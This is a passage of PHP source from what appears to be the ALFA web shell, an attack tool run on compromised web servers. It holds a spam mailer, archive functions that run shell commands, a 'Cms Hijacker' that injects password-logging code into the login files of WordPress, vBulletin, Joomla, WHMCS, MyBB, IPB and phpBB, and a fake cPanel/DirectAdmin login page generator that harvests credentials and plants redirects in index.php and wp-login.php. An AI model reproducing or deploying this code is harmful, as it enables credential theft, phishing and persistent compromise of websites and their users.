5299$mail_to = $_POST['alfa1'];
5300$mail_from = $_POST['alfa2'];
5301$mail_subject = $_POST['alfa3'];
5302$mail_content = $_POST['alfa5'];
5303$count_mail = (int)$_POST['alfa6'];
5304$mail_attach = $_POST['alfa7'];
5305if(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){
5306if(!empty($mail_attach)&&@is_file($mail_attach)){
5307$file = $mail_attach;
5308$content = __read_file($file);
5309$content = chunk_split(__ZW5jb2Rlcg($content));
5310$uid = md5(uniqid(time()));
5311$filename = basename($file);
5312$headers = "From: ".$mail_from." <".$mail_from.">\r\n";
5313$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
5314$headers .= "Reply-To: ".$mail_from."\r\n";
5315$headers .= "Content-Type: multipart/mixed; boundary=\"".$uid."\"\r\n\r\n";
5316$headers .= 'MIME-Version: 1.0' . "\r\n";
5317$headers .= 'X-Mailer: php' . "\r\n";
5318$mail_content = "--".$uid."\r\n";
5319$mail_content .= "Content-type:text/plain; charset=iso-8859-1\r\n";
5320$mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
5321$mail_content .= $mail_content."\r\n\r\n";
5322$mail_content .= "--".$uid."\r\n";
5323$mail_content .= "Content-Type: application/octet-stream; name=\"".$filename."\"\r\n";
5324$mail_content .= "Content-Transfer-Encoding: base64\r\n";
5325$mail_content .= "Content-Disposition: attachment; filename=\"".$filename."\"\r\n\r\n";
5326$mail_content .= $content."\r\n\r\n";
5327$mail_content .= "--".$uid."--";
5328}else{
5329$headers = "From: " . $mail_from. " ( ".$mail_from." ) \r\n";
5330$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
5331$headers .= 'Reply-To: '.$mail_from.'' . "\r\n";
5332$headers .= 'Content-type: text/html; charset=utf-8' . "\r\n";
5333$headers .= 'MIME-Version: 1.0' . "\r\n";
5334$headers .= 'X-Mailer: php' . "\r\n";
5335}
5336if(empty($count_mail)||$count_mail<1)$count_mail=1;
5337if(!empty($mail_from)){echo __pre();
5338for($i=1;$i<=$count_mail;$i++){
5339if(@mail($mail_to,$mail_subject,$mail_content,$headers))echo("<center>Sent -> $mail_to<br></center>");
5340}}else{__alert("Invalid Mail From !");}
5341}else{__alert("Invalid Mail To !");}
5342}
5343echo('</div>');
5344alfafooter();
5345}
5346function alfaziper(){
5347alfahead();
5348AlfaNum(8,9,10);
5349echo '<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>
5350<form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
5351<div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="'.(!empty($_POST['alfa3'])?htmlspecialchars($_POST['alfa3']):htmlspecialchars($GLOBALS['cwd'])).'" size="60"/>
5352<div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'alfa.zip" size="60"/>
5353<input type="submit" value=" " name="ziper" />
5354</form></center></p>';
5355if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
5356$dirzip = $_POST['alfa3'];
5357$zipfile = $_POST['alfa4'];
5358if($GLOBALS['sys']!='unix'&&_alfa_can_runCommand(true,true)){
5359alfaEx("powershell Compress-Archive -Path '".addslashes($dirzip)."' -DestinationPath '".addslashes(basename($zipfile))."'");
5360echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font></b></p></center>';
5361}elseif($GLOBALS['sys']=='unix'&&_alfa_can_runCommand(true,true)){
5362alfaEx("cd '".addslashes(dirname($zipfile))."';zip -r '".addslashes(basename($zipfile))."' '".addslashes($dirzip)."'");
5363echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font></b></p></center>';
5364}elseif(class_exists('ZipArchive')){
5365if(__alfaziper($dirzip, $zipfile)){
5366echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font></p></center>';
5367}else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';}
5368}
5369}
5370echo '</div>';
5371alfafooter();
5372}
5373function __alfaziper($source,$destination){
5374 if(!extension_loaded('zip')||!file_exists($source)){
5375 return false;
5376 }
5377 $zip=new ZipArchive();
5378 if(!$zip->open($destination,ZIPARCHIVE::CREATE)){
5379 return false;
5380 }
5381 $source=str_replace('\\','/',realpath($source));
5382 if(is_dir($source)===true){
5383 $files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);
5384 foreach($files as $file){
5385 $file=str_replace('\\','/',$file);
5386 if(in_array(substr($file,strrpos($file,'/')+1),array('.','..')))continue;
5387 $file=realpath($file);
5388 if(is_dir($file)===true){
5389 $zip->addEmptyDir(str_replace($source.'/','',$file.'/'));
5390 }else if(is_file($file)===true){
5391 $zip->addFromString(str_replace($source.'/','',$file),file_get_contents($file));
5392 }
5393 }
5394 }else if(is_file($source)===true){
5395 $zip->addFromString(basename($source),file_get_contents($source));
5396 }
5397 return $zip->close();
5398}
5399function alfadeziper(){
5400alfahead();
5401AlfaNum(8,9,10);
5402echo '<div class=header><p><center><p><div class="txtfont_header">| DeCompressor |</div></p>
5403<form onSubmit="g(\'deziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
5404<div class="txtfont">File: </div> <input type="text" name="dirzip" value="'.(!empty($_POST['alfa3'])?htmlspecialchars($_POST['alfa3']):htmlspecialchars($GLOBALS['cwd'])).'" size="60"/>
5405<div class="txtfont">Extract To: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'" size="60"/>
5406<input type="submit" value=" " name="ziper" />
5407</form></center></p>';
5408if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
5409$dirzip = $_POST['alfa3'];
5410$zipfile = $_POST['alfa4'];
5411if(@!is_dir($zipfile)){
5412 @mkdir($zipfile, 0777, true);
5413}
5414$finfo = "";
5415$file_type = "";
5416if(function_exists('finfo_open')){
5417$finfo = @finfo_open(FILEINFO_MIME_TYPE);
5418$file_type = @finfo_file($finfo, $dirzip);
5419@finfo_close($finfo);
5420}else{
5421 if($GLOBALS['sys']=='unix'&&_alfa_can_runCommand(true,true)){
5422 $file_type = alfaEx('file -b --mime-type ' . $dirzip);
5423 }
5424}
5425if($GLOBALS['sys']!='unix'&&_alfa_can_runCommand(true,true)){
5426alfaEx("powershell expand-archive -path '".addslashes($dirzip)."' -destinationpath '".addslashes(basename($zipfile))."'");
5427echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font></b></p></center>';
5428}elseif($GLOBALS['sys']=='unix'&&!empty($file_type)&&_alfa_can_runCommand(true,true)&&(strlen(alfaEx('which unzip')) > 0||strlen(alfaEx('which tar')) > 0||strlen(alfaEx('which gunzip')) > 0)){
5429switch ($file_type) {
5430 case 'application/zip':
5431 alfaEx("cd '".addslashes($zipfile)."';unzip '".addslashes($dirzip)."'");
5432 break;
5433 case 'application/x-tar': case 'application/x-gzip': case 'application/x-gtar':
5434 if(strstr(basename($dirzip), ".tar.gz")||strstr(basename($dirzip), ".tar")){
5435 alfaEx("cd '".addslashes($zipfile)."';tar xzf '".addslashes($dirzip)."'");
5436 }else{
5437 alfaEx("cd '".addslashes($zipfile)."';gunzip '".addslashes($dirzip)."'");
5438 }
5439 break;
5440}
5441echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font> <a style="cursor:pointer;" onclick="g(\'FilesMan\',\''.$zipfile.'\');">[ View Folder ]</a></b></p></center>';
5442}elseif(class_exists('ZipArchive')){
5443 $itsok = false;
5444 if(emtpy($file_type)){
5445 $file_type = "application/zip";
5446 }
5447 switch ($file_type) {
5448 case 'application/zip':
5449 $zip = new ZipArchive;
5450 $res = $zip->open($dirzip);
5451 if ($res) {
5452 $zip->extractTo($zipfile);
5453 $zip->close();
5454 $itsok = true;
5455 }
5456 break;
5457 case 'application/x-tar': case 'application/x-gzip': case 'application/x-gtar':
5458 if(strstr(basename($dirzip), ".tar.gz")){
5459 $new_file = $zipfile .'/'. basename($dirzip);
5460 @copy($dirzip, $new_file);
5461 $new_tar = str_replace(".tar.gz", ".tar", $new_file);
5462 try {
5463 $p = new PharData($new_file);
5464 $p->decompress();
5465 $phar = new PharData($new_tar);
5466 $phar->extractTo($zipfile);
5467 @unlink($new_file);
5468 @unlink($new_tar);
5469 $itsok = true;
5470 } catch (Exception $e) {
5471 }
5472 }else{
5473 try {
5474 $phar = new PharData($dirzip);
5475 $phar->extractTo($zipfile);
5476 $itsok = true;
5477 } catch (Exception $e) {
5478 }
5479 }
5480 break;
5481 }
5482if($itsok){
5483echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font> <a style="cursor:pointer;" onclick="g(\'FilesMan\',\''.$zipfile.'\');">[ View Folder ]</a></p></center>';
5484}else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';}
5485}
5486}
5487echo '</div>';
5488alfafooter();
5489}
5490function alfacmshijacker(){
5491alfahead();
5492AlfaNum(5,6,7,8,9,10);
5493echo '<div class=header><br>
5494<center><div class="txtfont_header">| Cms Hijacker |</div><br><br><form onSubmit="g(\'cmshijacker\',null,this.cmshi.value,this.saveto.value,\'>>\',this.cmspath.value);return false;" method=\'post\'>
5495<div class="txtfont">CMS: <select style="width:100px;" name="cmshi">';
5496$cm_array = array("vb"=>"vBulletin","wp"=>"wordpress","jom"=>"joomla","whmcs"=>"whmcs","mybb"=>"mybb","ipb"=>"ipboard","phpbb"=>"phpbb");
5497foreach($cm_array as $key=>$val)echo '<option value="'.$key.'">'.$val.'</option>';
5498echo("</select>");
5499echo ' Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">
5500SaveTo: <input size="50" type="text" name="saveto" value="'.$GLOBALS['cwd'].'alfa.txt"></font>
5501<input type="submit" name="btn" value=" "></form></center><br>';
5502$cms = $_POST['alfa1'];
5503$saveto = $_POST['alfa2'];
5504$cmspath = $_POST['alfa4'];
5505if(!empty($cms) AND !empty($saveto) AND $_POST['alfa4'] AND $_POST['alfa3'] == '>>'){
5506echo __pre();
5507alfaHijackCms($cms,$cmspath,$saveto);
5508}
5509echo '</div>';
5510alfafooter();
5511}
5512function alfaHijackCms($cms,$cmspath,$saveto){
5513switch($cms){
5514case "vb":
5515hijackvBulletin($cmspath,$saveto);
5516break;
5517case "wp":
5518hijackwp($cmspath,$saveto);
5519break;
5520case "jom":
5521hijackJoomla($cmspath,$saveto);
5522break;
5523case "whmcs":
5524hijackWhmcs($cmspath,$saveto);
5525break;
5526case "mybb":
5527hijackMybb($cmspath,$saveto);
5528break;
5529case "ipb":
5530hijackIPB($cmspath,$saveto);
5531break;
5532case "phpbb":
5533hijackPHPBB($cmspath,$saveto);
5534break;
5535default:
5536echo "error!";
5537break;
5538}
5539}
5540function hijackvBulletin($path,$saveto){
5541$code='$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $vbulletin->db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");while($row = $vbulletin->db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \' : \' . $alfa_password." (" . $row["email"] . ")\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
5542$clearpw = 'defined(\'DISABLE_PASSWORD_CLEARING\')';
5543$code=str_replace('{saveto_path}',$saveto,$code);
5544$login = $path."/login.php";
5545$class = $path."/includes/class_bootstrap.php";
5546$dologin = 'do_login_redirect();';
5547$evil_login = "\t".$code."\n\t".$dologin;
5548$evil_class = "true";
5549if((@is_file($login) AND @is_writable($login)) || (@is_file($class) AND @is_writable($class))){
5550$data_login = @file_get_contents($login);
5551$data_class = @file_get_contents($class);
5552if(strstr($data_login, $dologin) || strstr($data_class, $clearpw)){
5553$login_replace = str_replace($dologin,$evil_login, $data_login);
5554$class_replace = str_replace($clearpw,$evil_class, $data_class);
5555@file_put_contents($login, $login_replace);
5556@file_put_contents($class, $class_replace);
5557hijackOutput(0,$saveto);
5558}else{
5559hijackOutput(1);
5560}
5561}else{
5562hijackOutput(1);
5563}
5564}
5565function hijackwp($path,$saveto){
5566$code = '$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\'log\']." : ".$_POST[\'pwd\']." (".($user->user_email).")\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
5567$redirect_wp = '#if[ ]{0,}\([ ]{0,}![ ]{0,}is_wp_error\([ ]{0,}\$user[ ]{0,}\)[ ]{0,}&&[ ]{0,}![ ]{0,}\$reauth[ ]{0,}\)[ ]{0,}{#';
5568$code=str_replace('{saveto_path}',$saveto,$code);
5569$login=$path."/wp-login.php";
5570if(@is_file($login) AND @is_writable($login)){
5571$data_login = @file_get_contents($login);
5572if(@preg_match($redirect_wp, $data_login, $match)){
5573$evil_login = "\t".$match[0]."\n\t".$code;
5574$login_replace = @preg_replace($redirect_wp,$evil_login, $data_login);
5575@file_put_contents($login, $login_replace);
5576hijackOutput(0,$saveto);
5577}else{
5578hijackOutput(1);
5579}
5580}else{
5581hijackOutput(1);
5582}
5583}
5584function hijackJoomla($path,$saveto){
5585$code = '<?php jimport(\'joomla.user.authentication\');$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array(\'username\'=>$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>';
5586$code=str_replace('{saveto_path}',$saveto,$code);
5587$comp=$path."/administrator/components/com_login/";
5588if(@is_file($comp."/login.php")){
5589$login = $comp."/login.php";
5590}elseif(@is_file($comp."/admin.login.php")){
5591$login = $comp."/admin.login.php";
5592}else{
5593$login = '';
5594}
5595if(@is_file($login) AND @is_writable($login) AND $login != ''){
5596$data_login = @file_get_contents($login);
5597$evil_login = $code."\n".$data_login;
5598@file_put_contents($login, $evil_login);
5599hijackOutput(0,$saveto);
5600}else{
5601hijackOutput(1);
5602}
5603}
5604function hijackWhmcs($path,$saveto){
5605$code = '<?php if(isset($_POST[\'username\']) AND isset($_POST[\'password\']) AND !empty($_POST[\'username\']) AND !empty($_POST[\'password\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST[\'username\'];$alfa_pw = @$_POST[\'password\'];if(isset($_POST[\'language\'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = \'$alfa_uname\' AND `password` = \'".md5($alfa_pw)."\'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = \'$alfa_uname\'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\':\', $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\'username\'] . \' : \' . $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>';
5606$code=str_replace('{saveto_path}',$saveto,$code);
5607$conf=$path."/configuration.php";
5608if(@is_file($conf) AND @is_writable($conf)){
5609$data_conf = @file_get_contents($conf);
5610if(!strstr($data_conf,'?>'))$code = '?>'.$code;
5611$evil_conf = $data_conf."\n".$code;
5612@file_put_contents($conf, $evil_conf);
5613hijackOutput(0,$saveto);
5614}else{
5615hijackOutput(1);
5616}
5617}
5618function hijackMybb($path,$saveto){
5619$code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);';
5620$find = '$loginhandler->complete_login();';
5621$code=str_replace('{saveto_path}',$saveto,$code);
5622$login=$path."/member.php";
5623$evil_login = "\t".$code."\n\t".$find;
5624if(@is_file($login) AND @is_writable($login)){
5625$data_login = @file_get_contents($login);
5626if(strstr($data_login, $find)){
5627$login_replace = str_replace($find,$evil_login, $data_login);
5628@file_put_contents($login, $login_replace);
5629hijackOutput(0,$saveto);
5630}else{
5631hijackOutput(1);
5632}
5633}else{
5634hijackOutput(1);
5635}
5636}
5637function hijackIPB($path,$saveto){
5638$code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
5639$find = 'unset( $member[\'plainPassword\'] );';
5640$code=str_replace('{saveto_path}',$saveto,$code);
5641$login=$path."/admin/sources/handlers/han_login.php";
5642$evil_login = "\t".$find."\n\t".$code;
5643if(@is_file($login) AND @is_writable($login)){
5644$data_login = @file_get_contents($login);
5645if(strstr($data_login, $find)){
5646$login_replace = str_replace($find,$evil_login, $data_login);
5647@file_put_contents($login, $login_replace);
5648hijackOutput(0,$saveto);
5649}else{
5650hijackOutput(1);
5651}
5652}else{
5653hijackOutput(1);
5654}
5655}
5656function hijackPHPBB($path,$saveto){
5657$code = '$Alfa_u = request_var(\'username\', \'\');$Alfa_p = request_var(\'password\', \'\');if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
5658$find = 'case \'login\':';
5659$code=str_replace('{saveto_path}',$saveto,$code);
5660$login=$path."/ucp.php";
5661$evil_login = "\t".$find."\n\t".$code;
5662if(@is_file($login) AND @is_writable($login)){
5663$data_login = @file_get_contents($login);
5664if(strstr($data_login, $find)){
5665$login_replace = str_replace($find,$evil_login, $data_login);
5666@file_put_contents($login, $login_replace);
5667hijackOutput(0,$saveto);
5668}else{
5669hijackOutput(1);
5670}
5671}else{
5672hijackOutput(1);
5673}
5674}
5675function hijackOutput($c=0,$p=''){echo($c==0?"<center><font color='green'>Success</font> --> path: $p</center>":'<center><font color="red">Error in inject code !</font></center>');}
5676function Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){
5677if(@is_dir($dir)){
5678$files=@scandir($dir);
5679foreach($files as $key => $value){
5680$path=@realpath($dir. DIRECTORY_SEPARATOR .$value);
5681if(!@is_dir($path)){
5682if($ext!='*'){$f = basename($path);$f = explode('.',$f);$f = end($f);if($f!=$ext)continue;}
5683if($e=='str'){
5684$content = @file_get_contents($path);
5685if(strpos($content, $string) !== false){
5686echo str_replace('\\','/',$path) . "<br>";
5687}
5688}else{
5689if(strstr($value,$string)){
5690echo str_replace('\\','/',$path) . "<br>";
5691}
5692}
5693$results[] = $path;
5694}elseif($value != "." && $value != "..") {
5695Alfa_StrSearcher($path,$string,$ext,$e,$results);
5696$results[] = $path;
5697}}}}
5698function alfafakepage(){
5699 alfahead();
5700 AlfaNum(9,10);
5701 echo '<div class=header><br>
5702 <center><div class="txtfont_header">| Host Manager Fake page |</div></center><br><br><form onSubmit="g(\'fakepage\',null,this.clone_page.value,this.fake_root.value,\'>>\',this.logto.value,this.panel.value,this.inject_to.value,this.bind_on.value,this.count.value);return false;" method=\'post\'>
5703 <div class="txtfont" style="position: relative;left: 50%;transform: translate(-50%);"><div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Panel: </span><select style="width:100px;" name="panel">';
5704 $cm_array = array("cpanel"=>"Cpanel","directadmin"=>"DirectAdmin");
5705 foreach($cm_array as $key=>$val)echo '<option value="'.$key.'">'.$val.'</option>';
5706 echo("</select></div>");
5707 echo '<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Clone page: </span><input size="50" type="text" name="clone_page" placeholder="eg: https://target.com:2083 | https://target.com:2222"></div>
5708 <div style="margin-bottom:6px;"><span>Fake page root: </span><input size="50" type="text" name="fake_root" value="'.$_SERVER["DOCUMENT_ROOT"].'/fake_page_root/"></div>
5709 <div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Inject to: </span><input size="50" type="text" name="inject_to" value="'.$_SERVER["DOCUMENT_ROOT"].'/index.php"></div>
5710 <div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Bind on: </span><input size="50" type="text" name="bind_on" placeholder="eg: '.$_SERVER["DOCUMENT_ROOT"].'/wp-login.php"></div>
5711 <div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Log To: </span><input size="50" type="text" name="logto" value="'.$GLOBALS['cwd'].'logs.txt"></div>
5712 <div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Count of Invalid login: </span><input size="20" type="text" name="count" value="3" style="text-align:center;"></div>
5713 <div style="text-align:center;"><input type="submit" name="btn" value=" "></div></div></form><br>';
5714 $clone_page = $_POST['alfa1'];
5715 $fake_root = $_POST['alfa2'];
5716 $logto = $_POST['alfa4'];
5717 $panel = $_POST['alfa5'];
5718 $inject_to = $_POST['alfa6'];
5719 $bind_on = $_POST['alfa7'];
5720 $count = $_POST['alfa8'];
5721 if(!empty($clone_page) && !empty($fake_root) && !empty($logto) && !empty($inject_to) && !empty($bind_on) && $_POST['alfa3'] == '>>'){
5722 echo __pre();
5723 $target = $clone_page;
5724 $curl = new AlfaCURL();
5725 $source_page = $curl->Send($target);
5726 if(!empty($source_page)){
5727 $matched_form = "";
5728 if($panel == "cpanel"){
5729 if(preg_match('#<form(.*)id="login_form"(.*)>#', $source_page, $match)){
5730 $matched_form = $match[0];
5731 }
5732 }else{
5733 if(preg_match('#<form(.*?)>#', $source_page, $match)){
5734 $matched_form = $match[0];
5735 }
5736 }
5737 if(!empty($matched_form)){
5738 $fake = "";
5739 $pwd = str_replace($_SERVER["DOCUMENT_ROOT"], '', $fake_root);
5740 $uri = str_replace($_SERVER["DOCUMENT_ROOT"], '', $inject_to);
5741 if($panel == "cpanel"){
5742 $port = "2083";
5743 }else{
5744 $target = str_replace(array("http://", "https://"), "", $target);
5745 $port = explode(":",$target);
5746 $port = $port[1];
5747 }
5748 if(substr($uri, 0, 1) == "/"){
5749 $uri = substr($uri, 1);
5750 }
5751 $uri = $_SERVER["HTTP_ORIGIN"] . '/' . str_replace("index.php", "", $uri) . '?:' . $port;
5752 $log_url = $_SERVER["HTTP_ORIGIN"] . $pwd . '/log.php';
5753 if($panel == "cpanel"){
5754 $form = '<form novalidate id="login_form" action="'.$log_url.'" method="post" target="_top" style="visibility:">';
5755 }else{
5756 $form = '<form action="'.$log_url.'" method="post">';
5757 }
5758 $fake = str_replace($matched_form, $form, $source_page);
5759 if(@!is_dir($fake_root)){
5760 @mkdir($fake_root, 0777, true);
5761 }
5762
5763 $cookie_name = "alfa_fakepage_counter" . rand(9999,99999);
5764
5765 $post_user = 'user';
5766 $post_pass = 'pass';
5767 $resp_code = 'if(empty($user)){http_response_code(400);echo json_encode(array("message" => "no_username"));}else{http_response_code(401);}';
5768 if($panel != "cpanel"){
5769 $post_user = 'username';
5770 $post_pass = 'password';
5771 $resp_code = '@header("Location: ".$_SERVER[\'HTTP_REFERER\']);';
5772 }
5773
5774 $cpanel_log = '<?php $cook_time = time()+(86400 * 7); $user = $_POST["'.$post_user.'"];$pass = $_POST["'.$post_pass.'"];if(!empty($user) && !empty($pass)){if(!isset($_COOKIE["'.$cookie_name.'"])){@setcookie("'.$cookie_name.'", 0, $cook_time, "/");$_COOKIE["'.$cookie_name.'"]=1;}if((int)$_COOKIE["'.$cookie_name.'"]>'.$count.'){@header("Location: /");exit;}@setcookie("'.$cookie_name.'", ((int)$_COOKIE["'.$cookie_name.'"] + 1), $cook_time, "/");$fp = @fopen("'.$logto.'", "a+");@fwrite($fp, $user . " : " . $pass . "\n");fclose($fp);sleep(3);'.$resp_code.'exit;}?>';
5775
5776 @file_put_contents($fake_root.'/log.php', $cpanel_log);
5777
5778 if($panel == "cpanel"){
5779 $fake = preg_replace(array('#<link(.*)href="(.*)"(.*)>#', '#<img class="main-logo" src="(.*)"(.*)>#', '# <a(.*)id="reset_password">#'), array('<link href="'.$target.'/$2">', '<img class="main-logo" src="'.$target.'/$1" alt="logo" />', '<a href="#" id="reset_password">'), $fake);
5780 }
5781
5782 @file_put_contents($fake_root.'/index.php', $fake);
5783
5784 $inject_code = '<?php if(isset($_GET[":2083"])&&(int)$_COOKIE["'.$cookie_name.'"]<'.$count.'){@include("'.$fake_root.'/index.php");exit;}?>';
5785 $bind_on_code = '<?php if((int)$_COOKIE["'.$cookie_name.'"]<'.$count.'){@header("Location: '.$uri.'");exit;}?>';
5786
5787 @file_put_contents($inject_to, $inject_code . "\n" .@file_get_contents($inject_to));
5788 @file_put_contents($bind_on, $bind_on_code . "\n" .@file_get_contents($bind_on));
5789
5790 echo "success...!";
5791 }else{
5792 echo "failed...!";
5793 }
5794 }else{
5795 echo("<div style='text-align:center;color:red;'>Cannot open the target...!</div>");
5796 }
5797 }
5798 echo '</div>';
5799 alfafooter();
5800}
5801function alfaarchive_manager(){
5802 alfahead();
5803 $file = $_POST['alfa2'];
5804 if(!file_exists($file)){
5805 $file = $GLOBALS['cwd'];
5806 }
5807 $rand_id = rand(9999, 999999);
5808 echo '<div class=header><center><p><div class="txtfont_header">| Archive Manager |</div></p>';
5809 echo '<form name="srch" onSubmit="g(\'archive_manager\',null,null,this.file.value,null,null,\'>>\');return false;" method=\'post\'>
5810 <div class="txtfont">
5811 Archive file: <input size="50" id="target" type="text" name="file" value="'.$file.'">
5812 <input type="submit" name="btn" value=" "></div></form></center><br>';
5813 if($_POST['alfa5']=='>>'){
5814 //echo __pre();
5815 echo '<hr><div style="margin-left: 12px;" archive_full="phar://'.$file.'" archive_name="'.basename($file).'" id="archive_dir_'.$rand_id.'" class="archive_dir_holder"><span>PWD: </span><div class="archive_pwd_holder" style="display:inline-block"><a>/</a></div></div>';
5816 echo '<div style="padding: 10px;" id="archive_base_'.$rand_id.'">';
5817 __alfa_open_archive_file($file, $rand_id);
5818 echo '</div>';
5819 }
5820 echo '</div>';
5821 alfafooter();
5822}
5823function __alfa_open_archive_file($arch, $base_id=0){
5824 try{
5825 $files = array();
5826 $dirs = array();
5827 $archive = new PharData($arch);
5828 foreach($archive as $file) {
5829 $file_modify = @date('Y-m-d H:i:s', @filemtime($file->getPathname()));
5830 if($file->isDir()) {
5831 $dirs[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "dir", "modify" => $file_modify);
5832 }else{
5833 $file_size = @filesize($file->getPathname());
5834 $files[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "file", "modify" => $file_modify, "size" => $file_size);
5835 }
5836 }
5837 function __alfa_open_archive_usort($a, $b){
5838 return strcmp(strtolower($a['name']), strtolower($b['name']))*1;
5839 }
5840 usort($dirs, "__alfa_open_archive_usort");
5841 usort($files, "__alfa_open_archive_usort");
5842 $files = array_merge($dirs, $files);
5843 echo '<table width="100%" class="main" cellspacing="0" cellpadding="2"><tbody><tr><th>Name</th><th>Size</th><th>Modify</th><th>Actions</th></tr>';
5844 $icon = '<img class="archive-icons" src="'.findicon('..','dir').'" width="30" height="30">';
5845 echo '<tr><th><a base_id="'.$base_id.'" class="archive-file-row" fname=".." onclick="alfaOpenArchive(this);" path="'.dirname($arch.'.php').'">'.$icon.'<span class="archive-name archive-type-dir">| .. |</span></a><td>dir</td><td>-</td><td>-</td></tr>';
5846 foreach($files as $file){
5847 $icon = '<img class="archive-icons" src="'.findicon($file['name'],$file['type']).'" width="30" height="30">';
5848 if($file["type"] == "dir"){
5849 echo '<tr><th><a base_id="'.$base_id.'" class="archive-file-row" onclick="alfaOpenArchive(this);" path="'.$file["path"].'" fname="'.$file["name"].'">'.$icon.'<span class="archive-name archive-type-dir">| '.$file["name"].' |</span></a><td>dir</td><td>'.$file["modify"].'</td><td>-</td></tr>';
5850 }else{
